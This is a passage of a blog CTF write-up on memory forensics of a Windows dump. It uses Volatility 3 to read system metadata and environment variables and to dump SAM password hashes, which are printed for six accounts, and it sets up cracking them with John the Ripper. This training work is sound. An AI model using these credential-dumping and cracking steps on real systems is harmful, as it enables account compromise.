tag:blogger.com,1999:blog-73034004549797501012024-03-28T06:49:59.397-07:00Learning by practicingLearning is an ongoing activity ... practicing makes it funNik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.comBlogger417125tag:blogger.com,1999:blog-7303400454979750101.post-28549794411020378642024-03-08T20:56:00.000-08:002024-03-20T15:52:47.499-07:00**TOTAL RECALL 2024** - Memory Forensics Self-Paced Learning/Challenge/CTF<p>Similar to "<a href="https://www.securitynik.com/2023/09/solving-ctf-challenge-network-forensics.html" target="_blank"><i>Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego</i></a>" this challenge is meant to support our team's development.</p><p>This challenge can be looked at from both the Blue and Red Team perspectives. </p><p>Blue team because, this is how we hope to find threats either from a "live" system or more specifically, in this case, from the contents of extracted memory, i.e. memory dumps, crash dumps, etc.</p><p>Red teams because threat actors can steal memory dumps to gain access to sensitive information. For those thinking this is far fetched, see this link for more info on a recent compromise, that occurred at Microsoft: <a href="https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/">Results of Major Technical Investigations for Storm-0558 Key Acquisition | MSRC Blog | Microsoft Security Response Center</a>. </p><p>Here is a brief from the link:<br /><i>"Our investigation found that a consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (“crash dump”). The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump ..."</i></p><p><i>After April 2021, when the key was leaked to the corporate environment in the crash dump, the Storm-0558 actor was able to successfully compromise a Microsoft engineer’s corporate account. This account had access to the debugging environment containing the crash dump which incorrectly contained the key. Due to log retention policies, we don’t have logs with specific evidence of this exfiltration by this actor, but this was the most probable mechanism by which the actor acquired the key."</i></p><p>As seen above, memory can and does contain a lot of sensitive information. More importantly, it is not in every incident you will have all the logs as mentioned above. </p><p>With that in mind, <b><i>Welcome to **Total Recall 2024** </i></b>where we try to build our memory forensics skills while having fun.</p><p><b>Scenario:<br /></b></p><p class="MsoNormal"><i><span style="font-family: "Times New Roman", serif;">As the Lead Incident Handler at **TOTAL RECALL Inc.** a memory
forensics company, you have been assigned a case to determine the extent of a
possible compromise at a highly confidential client. The client has followed
the NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response
and have done the evidence collection. Your job, is to examine, analyze and
report on this potential incident. </span></i><o:p></o:p></p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVHyGrslhh9zVntuHCw21xP7IsuqvhoJiK8zMaeAvYpvBOakeadMJWx8yugVK7Eg7vNMlILr4QNFILjxS7GyByqdSAtcsyvAQ72sRHYeVzPPUVP9IoXPqlCilGa_p1LvYt-Kp-5Q4kCjiLNuJkmy4HQQT1qo3e2MmNbNra91Hw3dHzJn_FSGp-Js2sDhw/s743/NIST-800-86.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="263" data-original-width="743" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVHyGrslhh9zVntuHCw21xP7IsuqvhoJiK8zMaeAvYpvBOakeadMJWx8yugVK7Eg7vNMlILr4QNFILjxS7GyByqdSAtcsyvAQ72sRHYeVzPPUVP9IoXPqlCilGa_p1LvYt-Kp-5Q4kCjiLNuJkmy4HQQT1qo3e2MmNbNra91Hw3dHzJn_FSGp-Js2sDhw/w400-h141/NIST-800-86.PNG" width="400" /></a></div><span style="font-size: 9pt;"><div style="text-align: center;"><span style="font-size: 9pt;">Source: NIST800-86: Guide to Integrating Forensic
Techniques into Incident Response</span></div></span><p></p><p class="MsoNormal" style="text-align: center;"><i><span style="font-family: "Times New Roman", serif;"></span></i></p><div style="text-align: left;"><i><i>You do not have any known Indicators of Compromise (IoC) or Events
of Interest (EoI) but have been tasked with determining the (potential)
compromise and its scope. That is all you have to go on!</i></i></div><p></p><p>
</p><p class="MsoNormal">As you answer the client’s questions, you should take notes, draw diagrams, etc. <o:p></o:p></p><p><span style="font-size: medium;"><b>Here are 10 things, you are guaranteed to learn by completing this challenge:</b><br /></span>1. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Memory Forensics: This is our primary objective!</span><br />2. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Extracting credentials from memory: Not just
passwords, but also web server (certificates) public and private key
information. <a href="https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/">Similar
to what happened with this compromise at Microsoft</a>. This allows us to
encrypt/decrypt, sign and verify items on the compromised server behalf.</span><br />3. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Perform network forensics (log analysis):
Yep! We extract the logs from the memory to learn more about the attack.</span><br />4. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Basic Malware Analysis: That's correct!
Extracting/Reconstructing executables from memory and doing basic static
analysis.</span><br />5. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Attack(s) identification: Learning to attribute
a particular tactic and or technique to a compromise.</span><br />6. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Vulnerability Research: Find the version of
software and any known vulnerabilities associated with same.</span><br />7. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Recovering PowerShell history from memory.</span><br />8. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Web Server configuration at the time of
compromise.</span><br />9. <span face=""Calibri",sans-serif" style="font-size: 11pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Detecting persistence in memory.</span><br />10. <span face="Calibri, sans-serif" style="font-size: 11pt;">Lots of fun learning about memory forensics.</span></p><p>Good luck and have fun learning!</p><p><a href="https://github.com/SecurityNik/CTF" target="_blank">Data for this challenge</a><br />Note: Try downloading the individual files if you have a problem downloading the entire package.</p><p><b><span style="font-size: medium;">My write-up for the challenge, so that readers can walk or follow through.</span></b></p><p>These first few questions allow us to learn about the received memory image, before performing any analysis.</p><p>When performing forensics, one of the first steps, is confirming the file integrity is intact.</p><div><div><b>Q</b>: What is md5sum hash of the file received:</div><div><b>A</b>:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">md5sum TOTAL_RECALL_2024.zip</span></b><span style="color: white;"> --tag</span></span>
<span><b><span style="color: #fcff01;">MD5 </span></b><span style="color: white;">(TOTAL_RECALL_2024.zip) = </span><span style="color: #fcff01;"><b>7dceb1fcae2ed8beacc8f81f85bf935c</b></span></span>
</pre></div><br /></div><div><div><b>Q</b>: Does this hash match the one provided?</div></div><div><b>A</b>: Yes: </div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span><span style="color: white;">└─$ cat </span><b><span style="color: #fcff01;">TOTAL_RECALL_2024.md5sum</span></b></span>
<span><b><span style="color: #fcff01;">7dceb1fcae2ed8beacc8f81f85bf935c</span></b><span style="color: white;"> TOTAL_RECALL_2024.zip</span></span>
</pre></div>
</div><div><br /></div><div><div>With the hashes confirmed, we can move on to our analysis.</div><div>Extracting the files from the ZIP file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span style="color: white;">└─$ unzip ChristmasChallenge2023.zip -d TOTAL_RECALL_2024/</span>
<span style="color: white;">Archive: ChristmasChallenge2023.zip</span>
<span style="color: white;"> inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.dmp</span>
<span style="color: white;"> inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.json</span>
</pre></div>
</div><div><br /></div><div><div>Change the directory so all output for this challenge is included there:</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES]</span>
<span style="color: white;">└─$ cd TOTAL_RECALL_2024/</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the memory dump file info specifically:</div><div><br /><b>Q:</b> What is the SHA256 hash of the file containing the memory dump?</div><div><b>A: </b><br /><b><!--HTML generated using hilite.me--></b><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white; font-weight: bold;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span><b>
</b><span><b><span style="color: white;">└─$ </span><span style="color: #fcff01;">sha256sum</span><span style="color: white;"> SECURITYNIK-WIN-20231116-235706.dmp</span></b></span><b>
</b><span style="color: #fcff01; font-weight: bold;">cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686 </span><span style="color: white; font-weight: bold;">SECURITYNIK-WIN-20231116-235706.dmp</span><b>
</b></pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What is the size of the memory dump file?</div><div><b>A:</b><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ls -l SECURITYNIK-WIN-20231116-235706.dmp -l</span>
<span><span style="color: white;">-rw-r--r-- 1 kali kali </span><b><span style="color: #fcff01;">4293816320 </span></b><span style="color: white;">Nov 16 18:57 SECURITYNIK-WIN-20231116-235706.dmp</span></span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> Were you able to confirm this file integrity? If yes, how?</div><div><b>A:</b> Yes! There is a JSON file that comes with the memory dump. Here is its information.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep fileInfo --after-context=2</span>
<span style="color: white;"> "fileInfo": {</span>
<span style="color: white;"> "fileSize": 4293816320,</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">"sha256": "cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686"</span></b></span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>I deliberately used the true date and time from the file. I'm sure someone is going to over think this :-D </div><div><br /></div><div>Looking at the machine info, answer the following questions:</div><div><b>Q:</b> What is the machine Architecture: </div><div><b>Q:</b> Date and time the memory dump was taken:</div><div><b>Q:</b> Domain the computer was part of:</div><div><b>Q:</b> The Machine ID:</div><div><b>Q:</b> The Machine Name:</div><div><b>Q:</b> What is the timestamp in raw epoch. For example: 133446526281339811:</div><div><b>Q:</b> Name of the user logged in at the time the capture was taken</div><div><br /></div><div><b>A:</b> All of this information above, can be found below.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep machineInfo --after-context=9</span>
<span style="color: white;"> "machineInfo": {</span>
<span style="color: white;"> "architectureType": "x64",</span>
<span style="color: white;"> "date": "2023-11-16T23:57:55.647Z",</span>
<span style="color: white;"> "domainName": "SECURITYNIK",</span>
<span style="color: white;"> "machineId": "3A424D56-BF4F-0582-FA8B-86105F2A025C",</span>
<span style="color: white;"> "machineName": "SECURITYNIK-WIN",</span>
<span style="color: white;"> "maxPhysicalMemory": 5368709120,</span>
<span style="color: white;"> "numberProcessors": 2,</span>
<span style="color: white;"> "timestamp": 133446526281339811,</span>
<span style="color: white;"> "userName": "securitynik"</span>
</pre></div>
</div><div><br /></div><div>Looking at the operating system information</div><div><div><br /></div><div>Product type is a desktop based on: <a href="https://learn.microsoft.com/en-us/windows/win32/msi/msintproducttype">MsiNTProductType property - Win32 apps | Microsoft Learn</a></div><div><b>Q: </b>What is the OS major version?</div><div><b>Q:</b> What is the OS minor version?</div><div><b>Q:</b> What is the product type?</div><div><b>Q:</b> Is the product type a server or desktop/workstation, etc.?</div><div><b>A:</b> Desktop because of product type 1:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep osVersion --after-context=7</span>
<span style="color: white;"> "osVersion": {</span>
<span style="color: white;"> "buildNumber": 22621,</span>
<span style="color: white;"> "majorVersion": 10,</span>
<span style="color: white;"> "minorVersion": 0,</span>
<span style="color: white;"> "productType": 1,</span>
<span style="color: white;"> "servicePackMajor": 0,</span>
<span style="color: white;"> "servicePackMinor": 0,</span>
<span style="color: white;"> "suiteMask": 256</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the memory acquisition info:</div><div><br /></div><div><b>Q: </b>What was the acquisition time of this memory dump?</div><div><b>Q:</b> What is the name of the tool/service used to capture this memory?</div><div><b>Q:</b> What version of the tool was used?</div><div><b>Q:</b> What is the total accessible pages of memory that was capture?</div><div><b>Q:</b> What is the total inaccessible pages of memory captured?</div><div><b>Q:</b> What is the total physical pages of memory captured?</div><div><br /></div><div><b>A:</b> All of the information requested above, can be found below.</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat SECURITYNIK-WIN-20231116-235706.json | grep serviceInfo --after-context=7</span>
<span style="color: white;"> "serviceInfo": {</span>
<span style="color: white;"> "acquisitionTime": "0:47",</span>
<span style="color: white;"> "ntStatus": 0,</span>
<span style="color: white;"> "serviceName": "DumpIt",</span>
<span style="color: white;"> "serviceVersion": "3.0.20180307.1",</span>
<span style="color: white;"> "totalAccessiblePages": 1048293,</span>
<span style="color: white;"> "totalInaccessiblePages": 0,</span>
<span style="color: white;"> "totalPhysicalPages": 1048293</span>
</pre></div>
</div><div><br /></div><div><div>All of the information above so far, can be had by just looking at the <i>SECURITYNIK-WIN-20231116-235706.json </i>file. This means simply opening this file, you get the answers to the first 22 questions!</div><div><br /></div><div>With information out of the way about the memory image. Time to actually perform the analysis.</div><div><br /></div><div>Typically, we want to start off with the <i>info.Info </i>plugin. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.info.Info</span>
<span style="color: white;">Volatility 3 Framework 2.5.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
<span style="color: white;">Variable Value</span>
<span style="color: white;">Kernel Base 0xf8021f400000</span>
<span style="color: white;">DTB 0x1ae000</span>
<span style="color: white;">Symbols file:///home/kali/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/9DC3FC69B1CA4B34707EBC57FD1D6126-1.json.xz</span>
<span style="color: white;">Is64Bit True</span>
<span style="color: white;">IsPAE False</span>
<span style="color: white;">layer_name 0 WindowsIntel32e</span>
<span style="color: white;">memory_layer 1 WindowsCrashDump64Layer</span>
<span style="color: white;">base_layer 2 FileLayer</span>
<span style="color: white;">KdVersionBlock 0xf802200099b0</span>
<span style="color: white;">Major/Minor 15.22621</span>
<span style="color: white;">MachineType 34404</span>
<span style="color: white;">KeNumberProcessors 2</span>
<span style="color: white;">SystemTime 2023-11-16 23:57:55</span>
<span style="color: white;">NtSystemRoot C:\Windows</span>
<span style="color: white;">NtProductType NtProductWinNt</span>
<span style="color: white;">NtMajorVersion 10</span>
<span style="color: white;">NtMinorVersion 0</span>
<span style="color: white;">PE MajorOperatingSystemVersion 10</span>
<span style="color: white;">PE MinorOperatingSystemVersion 0</span>
<span style="color: white;">PE Machine 34404</span>
<span style="color: white;">PE TimeDateStamp Mon Jul 16 20:24:05 2063</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the Windows session information.</div><div><br /></div><div>Get the data into a file as always;</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.sessions.Sessions</b></span><span style="color: white;"> > sessions.txt</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> How many unique Windows sessions are seen via the memory dump?</div><div> Sessions numbers are integer values</div><div><b>A:</b> Two sessions: 0 and 1<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ cat sessions.txt | awk --field-separator=' ' '{ print $1 }' | sort --unique</span>
<span style="color: white;">0</span>
<span style="color: white;">1</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What are these session associated with?</div><div><b>A:</b> Session 0 is used by services and other non-interactive applications</div><div>Logged in users must use session 1 and higher. This confirms earlier, there was only one user logged in, hence once session.</div><div><br /></div><div>Looking at the environment variables<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.envars.Envars</b></span><span style="color: white;"> > envars.txt</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> Where does the <i>"ComSpec"</i> environment variable point to?</div><div><b>A:</b> <i>ComSpec</i> points to: <i>"C:\Windows\system32\cmd.exe"</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'ComSpec.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">ComSpec C:\Windows\system32\cmd.exe</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the "USERNAME" defined?</div><div><b>A:</b> The usernames defined are:</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'USERNAME.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">USERNAME LOCAL SERVICE</span>
<span style="color: white;">USERNAME securitynik</span>
<span style="color: white;">USERNAME SECURITYNIK-WIN$</span>
<span style="color: white;">USERNAME SYSTEM</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the "OS" information?</div><div><b>A:</b> OS is reported as:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'OS.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">OS Windows_NT</span>
</pre></div>
</div></div><div><br /></div><div><div><b>Q:</b> What is/are the "COMPUTERNAME" name(s) identified?</div><div><b>A:</b> Computer name is:<br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ grep --perl-regexp 'COMPUTERNAME.*' envars.txt --only-matching | sort --unique</span>
<span style="color: white;">COMPUTERNAME SECURITYNIK-WIN</span>
</pre></div>
</div></div><div><br /></div><div><div>One of the first things any good hacker does once access is gained, is to obtain (dump) credentials. Once again red team stuff:-) We are here from the defenders' perspective but still can get credentials.</div><div><br /></div><div>If you answered the question above about the user(s) logged in at the time of the memory dump, then this question may or may not make more sense. </div><div><br /></div><div><b>Q:</b> How many user(s) are listed in the Security Accounts Manager (SAM) on this host?</div><div><b>A:</b> There are 6 users reported in the SAM</div><div><br /></div><div><b>Q:</b> What is/are the user(s) RID, username, LM Hash and NT Hash?</div><div><b>A:</b> There RID, Username, LM and NT hashes are</div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.hashdump.Hashdump</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.5.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished</span>
<span style="color: white;">User rid lmhash nthash</span>
<span style="color: white;">Administrator 500 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0</span>
<span style="color: white;">WDAGUtilityAccount <span> </span>504 aad3b435b51404eeaad3b435b51404ee 33651ad684b9bfb2e11f422d80b16ceb</span>
<span style="color: white;">securitynik 1001 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026</span>
<span style="color: white;">nakia 1003 aad3b435b51404eeaad3b435b51404ee f1c216dcadb73b5960bbcdf03bf3bbe0</span>
</pre></div>
</div><div><br /></div><div><div><b>Q:</b> What is/are the cleartext passwords?</div><div><br /></div><div>If you found the hashes above, you should be able to crack the passwords. </div><div><br /></div><div>There are a number of ways to solve this problem. We can redirect the output to a file and modify the file by replacing the spaces with a colon. This allows us to feed the new file into John the Ripper. </div><div><br /></div><div>First, add the <i>hashdump </i>plugin output to a file.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.hashdump.Hashdump > hashdump.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Clean up the file by replacing the spaces (" ") with a colon (":") Below shows the cleaned up file. At the same time, delete lines 1 to 4 at the beginning of the file.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
